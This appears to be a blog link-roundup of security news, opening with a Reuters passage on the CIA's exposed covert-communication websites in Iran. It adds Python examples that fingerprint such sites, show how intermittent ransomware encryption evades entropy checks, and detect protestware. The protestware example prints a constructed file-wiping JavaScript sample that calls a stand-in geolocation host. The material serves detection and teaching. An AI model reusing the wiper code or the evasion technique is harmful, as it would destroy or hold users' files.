“This is a very serious, very serious intelligence goal to penetrate Iran’s nuclear weapons program. You don’t get a much higher priority than that,” said James Lawler, a former CIA officer whose focus included weapons of mass destruction and Iran. “So when they do the risk-versus-gain analysis, you’ve got to consider the incredible amount of gain.”
Reuters, for the first time, gives an unprecedented firsthand account of the deadly spy game from the perspective of Iranians who served as CIA foot soldiers.
The six Iranians served prison terms ranging from five to 10 years. Four of them, including Hosseini, stayed in Iran after their release and remain vulnerable to rearrest. Two fled the country and have become stateless refugees.
The six men acknowledged that their CIA handlers never made firm promises to help if they were caught. Still, all had believed that U.S. assistance would one day come.
The espionage busts could pose a challenge to the CIA’s credibility as it seeks to rebuild its spy network in Iran. The country’s state media publicized some of these cases, portraying the agency as feckless and inept.
“It’s a stain on the U.S. government,” Hosseini told Reuters.
“CIA takes its obligations to protect the people that work with us very seriously and we know that many do so bravely at great personal risk,” Thorp said. “The notion that CIA would not work as hard as possible to safeguard them is false.”
What Hosseini didn’t know was that the world’s most powerful intelligence agency had given him a tool that likely led to his capture. In 2018, Yahoo News reported that a flawed web-based covert communications system had led to the arrest and execution of dozens of CIA informants in Iran and China.
Reuters located the secret CIA communications site identified by Hosseini, Iraniangoals.com, in an internet archive where it remains publicly available. Reuters then asked two independent cyber analysts – Bill Marczak of University of Toronto’s Citizen Lab, and Zach Edwards of Victory Medium – to probe how Iran may have used weaknesses in the CIA’s own technology to unmask Hosseini and other CIA informants. The two are experts on privacy and cybersecurity, with experience analyzing electronic intelligence operations. The effort represents the first independent technical analysis of the intelligence failure.
Marczak and Edwards quickly discovered that the secret messaging window hidden inside Iraniangoals.com could be spotted by simply right-clicking on the page to bring up the website’s coding. This code contained descriptions of secret functions, including the words “message” and “compose” – easily found clues that a messaging capability had been built into the site. The coding for the search bar that triggered the secret messaging software was labeled “password.”
Far from being customized, high-end spycraft, Iraniangoals.com was one of hundreds of websites mass-produced by the CIA to give to its sources, the independent analysts concluded. These rudimentary sites were devoted to topics such as beauty, fitness and entertainment, among them a Star Wars fan page and another for the late American talk show host Johnny Carson.
Each fake website was assigned to only one spy in order to limit exposure of the entire network in case any single agent was captured, two former CIA officials told Reuters.
But the CIA made identifying those sites easy, the independent analysts said. Marczak located more than 350 websites containing the same secret messaging system, all of which have been offline for at least nine years and archived. Edwards confirmed his findings and methodology. Online records they analyzed reveal the hosting space for these front websites was often purchased in bulk by the dozen, often from the same internet providers, on the same server space. The result was that numerical identifiers, or IP addresses, for many of these websites were sequential, much like houses on the same street.
“The CIA really failed with this,” said Marczak, the Citizen Lab researcher. The covert messaging system, he said, “stuck out like a sore thumb.”
In addition, some sites bore strikingly similar names. For example, while Hosseini was communicating with the CIA through Iraniangoals.com, a site named Iraniangoalkicks.com was built for another informant. At least two dozen of the 350-plus sites produced by the CIA appeared to be messaging platforms for Iranian operatives, the analysts found.
All told, these features meant the discovery of a single spy using one of these websites would have allowed Iranian intelligence to uncover additional pages used by other CIA informants. Once those sites were identified, nabbing the operatives using them would have been simple: The Iranians just had to wait and see who showed up. In essence, the CIA used the same row of bushes for its informants worldwide. Any attentive espionage rival would have been able to spot them all, the analysts said.
This vulnerability went far beyond Iran. Written in various languages, the websites appeared to be a conduit for CIA communications with operatives in at least 20 countries, among them China, Brazil, Russia, Thailand and Ghana, the analysts found.
CIA spokeswoman Thorp declined to comment on the system.
Reuters confirmed the nature of the intelligence failure of the CIA’s cookie-cutter websites with three former national security officials.
The agency wasn’t fully aware that this system had been compromised until 2013, after many of its agents began to go missing, according to the former U.S. officials.
Still, the CIA had never considered the network safe enough for its most prized sources. Top-tier informants receive custom-made covert communications tools, built from scratch at agency headquarters in Langley, Virginia, to seamlessly blend into the life of a spy without drawing attention, three former CIA officers said.
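The three weaknesses the analysts describe above (messaging function names and a search box wired as "password" visible in page source, front sites hosted on consecutive IP addresses, near-duplicate domain names) are all things an adversary can find with a script once one site is known. The following is an added example, not Reuters' or the analysts' tooling and not the content of Iraniangoals.com or any real front site: it runs those three checks over constructed data. Every domain, HTML snippet and IP address (drawn from the TEST-NET documentation ranges) below is made up for illustration; the similarity threshold is an assumption.

```python
"""Fingerprint mass-produced covert-messaging front sites.

Added example, not Reuters' or the two analysts' tooling. All pages, domains
and addresses below are CONSTRUCTED to mirror the report's description.
"""
import difflib
import ipaddress
import re

# Constructed archived pages. Three carry the tell-tale script names and a
# text box whose field is named "password"; the blog is an ordinary site.
PAGES = {
    "example-goals.com": """<html><body><h1>Football news</h1>
        <form><input type="text" id="password" placeholder="Search"></form>
        <script>function composeMessage(){} function sendMessage(){}</script>
        </body></html>""",
    "example-goalkicks.com": """<html><body><h1>Goal kicks weekly</h1>
        <form><input type="text" name="password"></form>
        <script>var compose = {}; var message = '';</script>
        </body></html>""",
    "starwarsfans.example": """<html><body><h1>Fan page</h1>
        <input type="text" id="password">
        <script>function message(){} function compose(){}</script>
        </body></html>""",
    "ordinaryblog.example": """<html><body><h1>My blog</h1>
        <form><input type="text" name="q" placeholder="Search"></form>
        <script>function toggleMenu(){}</script></body></html>""",
}

# Constructed hosting records (domain -> IPv4). Three front sites sit on
# consecutive addresses, "like houses on the same street"; the blog does not.
SITE_IPS = {
    "example-goals.com": "203.0.113.10",
    "example-goalkicks.com": "203.0.113.11",
    "starwarsfans.example": "203.0.113.12",
    "ordinaryblog.example": "198.51.100.7",
}

MARKERS = ("message", "compose")
# A text input whose name or id is "password", presented as a search box.
PASSWORD_FIELD = re.compile(r"<input[^>]*\b(?:name|id)=[\"']password[\"']", re.I)


def has_covert_markers(html):
    """True when the page source shows the messaging-system fingerprint."""
    lowered = html.lower()
    return all(m in lowered for m in MARKERS) and PASSWORD_FIELD.search(html) is not None


def flag_covert_sites(pages):
    return sorted(d for d, html in pages.items() if has_covert_markers(html))


def cluster_sequential_ips(site_ips):
    """Group domains whose IPv4 addresses form runs of consecutive integers."""
    ordered = sorted(site_ips.items(), key=lambda kv: int(ipaddress.ip_address(kv[1])))
    clusters, current, prev = [], [], None
    for domain, ip in ordered:
        n = int(ipaddress.ip_address(ip))
        if prev is not None and n != prev + 1:
            clusters.append(current)
            current = []
        current.append(domain)
        prev = n
    if current:
        clusters.append(current)
    return [c for c in clusters if len(c) > 1]


def similar_name_pairs(domains, threshold=0.75):
    """Pairs of leftmost labels that are near-duplicates (goals / goalkicks)."""
    labels = {d: d.split(".")[0] for d in domains}
    ds = sorted(domains)
    pairs = []
    for i, a in enumerate(ds):
        for b in ds[i + 1:]:
            if difflib.SequenceMatcher(None, labels[a], labels[b]).ratio() >= threshold:
                pairs.append((a, b))
    return pairs


def report(pages=PAGES, site_ips=SITE_IPS):
    """Combine the three signals: one known site leads to the others."""
    flagged = flag_covert_sites(pages)
    return {
        "flagged": flagged,
        "ip_clusters": cluster_sequential_ips({d: site_ips[d] for d in flagged}),
        "name_pairs": similar_name_pairs(flagged),
    }


if __name__ == "__main__":
    print(report())
```

The point of running the three checks together is the one the analysts make: any one signal is weak on its own, but a site that carries the markers, sits next to another flagged site in address space and shares most of its name with it is almost certainly part of the same batch, which is exactly the pivot that turns one captured informant into a list of others.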
Tomi Engdahl says:
Red Team – Physical Security – Covert Entry – EDC
https://github.com/DavidProbinsky/RedTeam-Physical-Tools#esp
Commonly used tools for Red Teaming Engagements, Physical Security Assessments, and Tactical Covert Entry.
Tomi Engdahl says:
https://hackaday.com/2022/09/30/this-week-in-security-exchange-0-day-doppelgangers-and-python-gets-bit-in-the-tar/
Chrome Root
Google Chrome is doing something new, that’s potentially controversial, that just might break things — so just another Friday. This one is a bit special, though. Google Chrome is going to begin shipping its own root store. That’s essentially the master list of what HTTPS certificates are considered valid by the browser. The big advantage here is this means that Chrome will behave the same across all platforms, no longer depending on the list of certificates provided by the OS. Of course, this also means that Google controls who gets to use HTTPS. If there is a certificate that has been manually added on the OS side, Chrome will pick it up and also honor it. We’ll see.
https://blog.chromium.org/2022/09/announcing-launch-of-chrome-root-program.html
Tomi Engdahl says:
https://hackaday.com/2022/09/30/this-week-in-security-exchange-0-day-doppelgangers-and-python-gets-bit-in-the-tar/
Intermittent Encryption, and Other Byte-Sized Stories
Ransomware campaigns have a new trick up their collective sleeves — intermittent encryption. It’s the observation that not every byte in a target file needs to be encrypted, in order to make it unusable for the owner. Encrypting every other 16 bytes makes for faster encryption and slower detection. There are other trends SentinelOne has discovered, like ransomware written in Rust and Go, and even more variations in Ransomware as a Service.
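Why skipping every other 16-byte block slows detection is easy to see in numbers. The following is an added example, not SentinelOne's analysis or any ransomware's code: it works in memory on a constructed low-entropy document, XORs only the even-numbered 16-byte blocks with a toy keystream (SHA-256 in counter mode, chosen so the block runs offline; it is an illustration, not a recommended cipher), and measures what an entropy-based monitor would see for full versus intermittent encryption.

```python
"""Entropy seen by a file monitor: full vs. intermittent encryption.

Added example, not from SentinelOne or any ransomware. The keystream is a toy
(SHA-256 counter mode) and the sample document is CONSTRUCTED.
"""
import hashlib
import math
from collections import Counter

BLOCK = 16


def keystream(key, nbytes):
    """Toy keystream: SHA-256(key || counter) blocks, illustration only."""
    out = bytearray()
    ctr = 0
    while len(out) < nbytes:
        out += hashlib.sha256(key + ctr.to_bytes(8, "big")).digest()
        ctr += 1
    return bytes(out[:nbytes])


def encrypt(data, key, intermittent):
    """XOR data with the keystream. With intermittent=True only even-numbered
    16-byte blocks (0, 2, 4, ...) are touched; odd blocks stay plaintext.
    Applying the same call twice restores the input."""
    ks = keystream(key, len(data))
    out = bytearray(data)
    for start in range(0, len(data), BLOCK):
        if intermittent and (start // BLOCK) % 2 == 1:
            continue                      # the "16 bytes on, 16 bytes off" pattern
        for i in range(start, min(start + BLOCK, len(data))):
            out[i] ^= ks[i]
    return bytes(out)


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, approaching 8.0 for random bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def changed_fraction(a, b):
    """Share of byte positions that differ between two equal-length buffers."""
    return sum(x != y for x, y in zip(a, b)) / len(a)


# Constructed low-entropy "document": repetitive ASCII, like a CSV export.
SAMPLE = b"account,amount,status\n" + b"ACME-0001,1200.00,PAID\n" * 40
KEY = b"demo-key-not-secret"


def compare(data=SAMPLE, key=KEY):
    """Numbers a monitor keyed on 'entropy jumped to ~8 bits' would compare."""
    full = encrypt(data, key, intermittent=False)
    partial = encrypt(data, key, intermittent=True)
    return {
        "plain_entropy": shannon_entropy(data),
        "full_entropy": shannon_entropy(full),
        "partial_entropy": shannon_entropy(partial),
        "partial_changed": changed_fraction(data, partial),
    }


if __name__ == "__main__":
    for k, v in compare().items():
        print(f"{k:16s} {v:.3f}")
```

The file is unusable either way (every 16-byte run of real content is broken up), but the intermittent version writes half as many bytes and its entropy lands well below the near-8-bit plateau that full encryption produces, so a detector thresholded on "looks like random data" fires late or not at all. Per-block entropy, or the ratio of changed to unchanged bytes in a write burst, is the kind of measure that still catches the alternating pattern.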
Tomi Engdahl says:
Gone in a day: Ethical hackers say it would take mere hours to empty your network
300 red teamers walk into a bar…
https://www.theregister.com/2022/10/01/ethical_hackers_sans_survey/
Once they’ve broken into an IT environment, most intruders need less than five hours to collect and steal sensitive data, according to a SANS Institute survey of more than 300 ethical hackers.
The respondents also proved the old adage that it’s not “if” but “when.” Even if their initial attack vector fails, almost 38 percent indicated they can break into an environment “more often than not” by repeated attacks.
So the research team went with the next-best option: the ethical hackers tasked with emulating the adversaries. They asked this group of bug hunters and penetration testers about their favorite attack vectors, the tools they use and their speed.
The bulk of the survey respondents (83.4%) work for companies headquartered in the US. And the largest segment (34.2%) said they worked in cybersecurity, with jobs ranging from security analyst to chief information security officer or VP of security or technology.
There’s value in knowing how long it takes an ethical hacker to breach an environment, how quickly they can shift gears, and what their favorite tactics are. Because that can help organizations focus their security investments in areas that will yield the greatest return on investment, Bromiley argued.
Speaking of return on investment, the survey found that the oldies but goodies continue to provide the biggest bang for the buck. In response to the question “Which attack vector is most likely to have the greatest return on investment?” social engineering (32.1%) and phishing (17.2%) were the top two answers. Can’t beat the classics.
For comparison, zero-day exploits (3.8%), man-in-the-middle attacks (1.4%) and DNS spoofing (1%) ranked last.
“Crafting a spear-phishing email or getting someone to click a link is relatively inexpensive, compared to writing your own piece of malware,” Bromiley pointed out, adding that this should send a straightforward message to security teams.
“Focus on the basics,” he advised. “Don’t forget that humans are involved in your security program. I do not blame the person who clicks in an email, but I do encourage that we train people to be vigilant. So user education has got to be part of our security program.”
Tomi Engdahl says:
This image shows its own MD5 checksum — and it’s kind of a big deal
https://www.bleepingcomputer.com/news/security/this-image-shows-its-own-md5-checksum-and-its-kind-of-a-big-deal/
Tomi Engdahl says:
How to Change the Boot Screen Logo on Windows With HackBGRT
https://www.makeuseof.com/windows-hackbgrt-guide/#Echobox=1664120012
Change the Windows logo on boot with whatever you like using HackBGRT.
Tomi Engdahl says:
‘Protestware’ is on the rise, with programmers self-sabotaging their own code. Should we be worried?
https://theconversation.com/protestware-is-on-the-rise-with-programmers-self-sabotaging-their-own-code-should-we-be-worried-190836#Echobox=1664315894
In March 2022, the author of node-ipc, a software library with over a million weekly downloads, deliberately broke their code. If the code discovers it is running within Russia or Belarus, it attempts to replace the contents of every file on the user’s computer with a heart emoji.
A software library is a collection of code other programmers can use for their purposes. The library node-ipc is used by Vue.js, a framework that powers millions of websites for businesses such as Google, Facebook, and Netflix.
This critical security vulnerability is just one example of a growing trend of programmers self-sabotaging their own code for political purposes. When programmers protest through their code – a phenomenon known as “protestware” – it can have consequences for the people and businesses who rely on the code they create.
Modern software systems are prone to vulnerabilities because they rely on third-party libraries. These libraries are made of code that performs particular functions, created by someone else. Using this code lets programmers add existing functions into their own software without having to “reinvent the wheel”.
The use of third-party libraries is common among programmers – it speeds up the development process and reduces costs.
These libraries are typically maintained by one or a handful of volunteers and made available to other programmers for free under an open-source software license.
The success of a third-party library is based on its reputation among programmers. A library builds its reputation over time, as programmers gain trust in its capabilities and the responsiveness of its maintainers to reported defects and feature requests.
If third-party library weaknesses are exploited, it could give attackers access to a software system. For example, a critical security vulnerability was recently discovered in the popular Log4j library.
What if vulnerabilities are not created by an attacker looking for passwords, but by the programmer themselves with the intention to make users of their library aware of a political opinion? The emergence of protestware is giving rise to such questions, and responses are mixed.
Ethical questions abound
A blog post on the Open Source Initiative site responds to the rise of protestware stating “protest is an important element of free speech that should be protected” but concludes with a warning:
“The downsides of vandalising open source projects far outweigh any possible benefit, and the blowback will ultimately damage the projects and contributors responsible.”
What is the main ethical question behind protestware? Is it ethical to make something worse in order to make a point? The answer to this question largely depends on the individual’s personal ethical beliefs.
Some people may see the impact of the software on its users and argue protestware is unethical if it’s designed to make life more difficult for them. Others may argue that if the software is designed to make a point or raise awareness about an issue, it may be seen as more ethically acceptable.
From a utilitarian perspective, one might argue that if a form of protestware is effective in bringing about a greater good (such as political change), then it can be morally justified.
From a technical standpoint, we are developing ways to automatically detect and counteract protestware. Protestware would be an unusual or surprising event in the change history of a third-party library. Mitigation is possible through redundancies – for example, code that is similar or identical to other code in the same or different libraries.
The rise of protestware is a symptom of a larger social problem. When people feel they are not being heard, they may resort to different measures to get their message across. In the case of programmers, they have the unique ability to protest through their code.
While protestware may be a new phenomenon, it is likely here to stay.
We rely on software to run our businesses and our lives. But every time we use software, we’re putting our trust in the people who wrote it. The emergence of protestware threatens to destabilise this trust if we don’t take action.
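The article's technical remark is that protestware shows up as a surprising event in a library's change history. One concrete form of that check is to compare the capabilities two versions of a dependency use before upgrading. The following is an added example, not the authors' research code and not node-ipc's actual source: it runs a capability-diff heuristic over two constructed versions of a small JavaScript module, where version A only does inter-process messaging and version B newly makes an outbound HTTP lookup of the host's country and walks the filesystem overwriting files, the shape of change described above. The capability patterns, module names and the geo endpoint are illustrative assumptions.

```python
"""Flag a surprising capability jump between two versions of a dependency.

Added example, not the authors' tooling or node-ipc's code. Both module
versions below are CONSTRUCTED and never executed; they are only scanned.
"""
import re

# Sinks grouped by capability. A library that never used a capability in the
# previous version and suddenly does deserves a human look before upgrade.
CAPABILITIES = {
    "filesystem_write": [
        r"\bfs\.(?:writeFile|writeFileSync|appendFile|appendFileSync|rm|rmSync|unlink|unlinkSync)\s*\("
    ],
    "filesystem_walk": [r"\bfs\.readdir(?:Sync)?\s*\("],
    "outbound_http": [
        r"""\brequire\(\s*['"](?:https?|http2|axios|node-fetch|got)['"]\s*\)""",
        r"\bfetch\s*\(",
    ],
    "geo_lookup": [r"\bcountry\b", r"\bgeoip\b", r"\bgeolocation\b"],
    "process_control": [r"""\brequire\(\s*['"]child_process['"]\s*\)""", r"\bprocess\.exit\s*\("],
}

# Version A: a minimal IPC helper over Unix sockets. Constructed.
VERSION_A = """\
const net = require('net');
const path = require('path');
function listen(id, cb) { const srv = net.createServer(cb); srv.listen(path.join('/tmp', id)); return srv; }
function send(sock, msg) { sock.write(JSON.stringify(msg)); }
module.exports = { listen, send };
"""

# Version B: same API, plus a region check that overwrites files. Constructed
# to match the behaviour the article describes; illustrative only.
VERSION_B = """\
const net = require('net');
const path = require('path');
const https = require('https');
const fs = require('fs');
const BLOCKED = ['XX', 'YY'];  // placeholder country codes
function listen(id, cb) { const srv = net.createServer(cb); srv.listen(path.join('/tmp', id)); return srv; }
function send(sock, msg) { sock.write(JSON.stringify(msg)); }
function overwriteTree(dir) {
  for (const f of fs.readdirSync(dir)) {
    const p = path.join(dir, f);
    try { fs.writeFileSync(p, 'REPLACED'); } catch (e) {}
  }
}
function checkRegion() {
  https.get('https://geo.example/json', res => {
    let body = '';
    res.on('data', d => { body += d; });
    res.on('end', () => { if (BLOCKED.includes(JSON.parse(body).country)) overwriteTree('/'); });
  });
}
checkRegion();
module.exports = { listen, send };
"""


def capabilities(source):
    """Set of capability names whose sink patterns appear anywhere in source."""
    return {cap for cap, pats in CAPABILITIES.items() if any(re.search(p, source) for p in pats)}


def new_capabilities(old_source, new_source):
    """Capabilities present in the new version but absent from the old one."""
    return sorted(capabilities(new_source) - capabilities(old_source))


def risky_lines(source, caps):
    """(line number, capability, line) for every line that hits a flagged sink."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for cap in caps:
            if any(re.search(p, line) for p in CAPABILITIES[cap]):
                hits.append((lineno, cap, line.strip()))
    return hits


if __name__ == "__main__":
    gained = new_capabilities(VERSION_A, VERSION_B)
    print("new capabilities:", gained)
    for lineno, cap, line in risky_lines(VERSION_B, gained):
        print(f"  line {lineno:3d} [{cap}] {line}")
```

This is a coarse static heuristic: it will not see sinks reached through `eval`, obfuscated strings or a freshly added transitive dependency, and the region check itself is ordinary-looking code. Its value is the diff, not the patterns: an IPC library that gains filesystem-write and geolocation capabilities in a patch release is the "unusual event in the change history" the article describes, and that is the moment to pin the previous version and read the changelog.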
Tomi Engdahl says:
Is This the Beginning of the End of the Internet?
How a single Texas ruling could change the web forever
https://www.theatlantic.com/ideas/archive/2022/09/netchoice-paxton-first-amendment-social-media-content-moderation/671574/
Earlier this month, the court upheld a preposterous Texas law stating that online platforms with more than 50 million monthly active users in the United States no longer have First Amendment rights regarding their editorial decisions. Put another way, the law tells big social-media companies that they can’t moderate the content on their platforms. YouTube purging terrorist-recruitment videos? Illegal. Twitter removing a violent cell of neo-Nazis harassing people with death threats? Sorry, that’s censorship, according to Andy Oldham, a judge of the United States Court of Appeals and the former general counsel to Texas Governor Greg Abbott.
A state compelling social-media companies to host all user content without restrictions isn’t merely, as the First Amendment litigation lawyer Ken White put it on Twitter, “the most angrily incoherent First Amendment decision I think I’ve ever read.” It’s also the type of ruling that threatens to blow up the architecture of the internet.
Tomi Engdahl says:
https://www.washingtonpost.com/politics/2022/09/29/inside-cyberattack-method-that-targets-your-cellphone/
Tomi Engdahl says:
https://techcrunch.com/2022/09/30/testgrid-is-a-one-stop-shop-for-testing-apps-at-scale/
Tomi Engdahl says:
https://techcrunch.com/2022/09/26/cloudflare-launches-an-esim-to-secure-mobile-devices/
Tomi Engdahl says:
https://www.raspberrypi.com/news/homemade-anti-tracking-device/
Tomi Engdahl says:
Finland’s telecommunications connections are protected in many ways https://www.huoltovarmuuskeskus.fi/a/suomen-tietoliikenneyhteydet-suojattu-monin-tavoin
The Nord Stream gas pipelines that ruptured on the bottom of the Baltic Sea have raised concern about whether the same could happen to the telecommunications cables running along the Baltic seabed. International telecommunications connections are, however, protected in many ways, and cutting the connections would require several simultaneous incidents.
Tomi Engdahl says:
FCC moves to block robotexts
https://www.malwarebytes.com/blog/news/2022/09/fcc-is-finally-moving-forward-with-blocking-spam-texts
“The American people are fed up with scam texts, and we need to use every tool we have to do something about it.” This is what Jessica Rosenworcel, Chairwoman of the US Federal Communications Commission (FCC), said after releasing a plan that will require mobile carriers to block “robotext” text messages. Just last month, the FCC warned of a steep rise in phishing over SMS (also known as smishing or robotexts).
The plan, known as a Notice of Proposed Rulemaking (NPRM), wants mobile wireless providers to “block texts, at the network level, that purport to be from invalid, unallocated, or unused numbers, and numbers on a Do-Not-Originate (DNO) list”. Such texts are deemed “highly likely to be illegal”.